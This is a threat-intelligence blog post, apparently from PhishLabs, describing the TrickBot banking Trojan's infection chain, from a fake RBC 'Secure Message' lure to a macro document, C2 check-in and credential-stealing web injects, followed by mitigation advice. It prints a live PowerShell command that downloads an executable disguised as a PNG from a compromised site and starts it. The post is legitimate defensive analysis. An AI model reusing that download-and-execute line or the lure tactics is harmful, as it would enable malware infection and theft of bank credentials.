Since the identification of TrickBot in late-2016, we have observed it targeting bank customers throughout the United States, United Kingdom, Germany, Australia, and Canada, following an attack pattern similar to the Trojan from which it was developed, Dyre. TrickBot enters into a victims machine and sends bank information to criminals through a complex series of events initiated by one click. Once initiated, TrickBot resides in the background, operating as unobtrusively as possible. While the process, from installation to credential theft, can happen in seconds, TrickBot follows discrete linear steps that provide opportunities for mitigation.
PhishLabs has observed TrickBot utilizing various email lures, but most commonly, the Trojan masquerades as an urgent bank document. Below is the body of a TrickBot email lure, sent from “RBC Royal Bank" <service@rbcroyalbanksecureemail[.]com> with the subject “Secure Message” and an attachment named SecureMessage.doc.
The criminals hope the work they have put in to making this seem like a legitimate email will entice the victim to open the malicious attachment. The attachment, shown below, is also crafted to appear authentic and instructs the user that, as the message was “RSA 2048 SSL” encrypted, they must enable “editing & content” to decrypt the important communication.
If a victim does “Enable Macros,” which are legitimately used in Office documents to automate tasks, the next step in the infection chain will begin.
With macros enabled, TrickBot begins installing itself and communicating with its command and control server. Inside the macro is a script that executes a command line function to retrieve and start TrickBot’s second stage.
- The enabled macro in SecureMessage.doc calls cmd.exe, the Windows command line interface
- Cmd.exe opens PowerShell, a program legitimately used to run administrative tasks
(New-Object System.Net.WebClient).DownloadFile('http://wp.pilbauer.com/wp-content/uploads/lordsofsteel.png' 'C:\Users\User1\AppData\Local\Temp\olqtn.exe');Start-Process 'C:\Users\User1\AppData\Local\Temp\olqtn.exe'
- PowerShell executes the above command to download and start TrickBot’s second stage
- This second stage is stored on a compromised wordpress site as lordsofsteel.png. Many browsers warn users when they download an executable file, by disguising it with an image file extension they are able to go undetected
- PowerShell then runs lordsofsteele.png as olqtn.exe, completing the installation process
TrickBot, now running as olqtn.exe, checks in with its command and control servers, sending the infected computer’s identification and reciveing its target list and execution instructions in the form of a configuration file.
If TrickBot establishes a connection with a command and control server it sends a client_id identifying the infected computer’s operating system and the campaign.
The server responds with the configuration file, the beginning of which is shown below, that enumerates the Trojan’s targets and the methods by which it will steal their credentials.
Now, fully loaded and in contact with its command and control servers, TrickBot is ready for a victim to enter their information into one of the targeted URLs and send them to the Trojan’s operators.
With TrickBot in the background monitoring the victim’s activity, it waits for them to navigate to a target URL, as shown below in a section pulled from the configuration file.
While login page appears normal to the victim, TrickBot has injected code from the server shown above in the configuration file. The code sends the login information to the financial institution as normal, but also sends it to the criminals to use themselves or to sell on underground forums.
There are multiple points along the delivery to absconsion process where TrickBot can be stopped. PhishLabs approaches mitigation from multiple angles, training users to be active in spotting phishing and the shut down of malicious servers and websites.
Prevention being better than the cure applies to computer viruses as well as biological. Training users to be wary of any unsolicited and urgent email is critical in stopping infections from starting. The resurgence of Macro’s as a tool for virus delivery means user must also exercise extreme caution when clicking enable.
By identifying, reporting, and shutting down pages hosting second stage malware payloads, like http://wp.pilbauer[.]com/wp-content/uploads/lordsofsteel.png, from which TrickBot was staged, PhishLabs prevents the victim’s machine to be fully compromised.
Through reversal and emulation of the Trojan, PhishLabs is able to speak to it as if it was an infected machine. This process allows us to trick TrickBot into sending us a configuration file which identifies the command and control servers being utilized which are then sent to our Security Operations Center for takedown. By taking those servers offline, a victim’s stolen credentials are sent to nowhere, stopping them from being collected and exploited by criminals.
PhishLabs actively monitors underground forums, dark web markets, and text storage sites for the trading or selling of client credentials. If found, we attempt to obtain them for client notification or, get our SOC to initiate takedown. Through our contacts in US and international law enforcement we provide information to agencies with jurisdiction to prosecute the threat actors operating Trojans.
If you need help defending against TrickBot, contact us.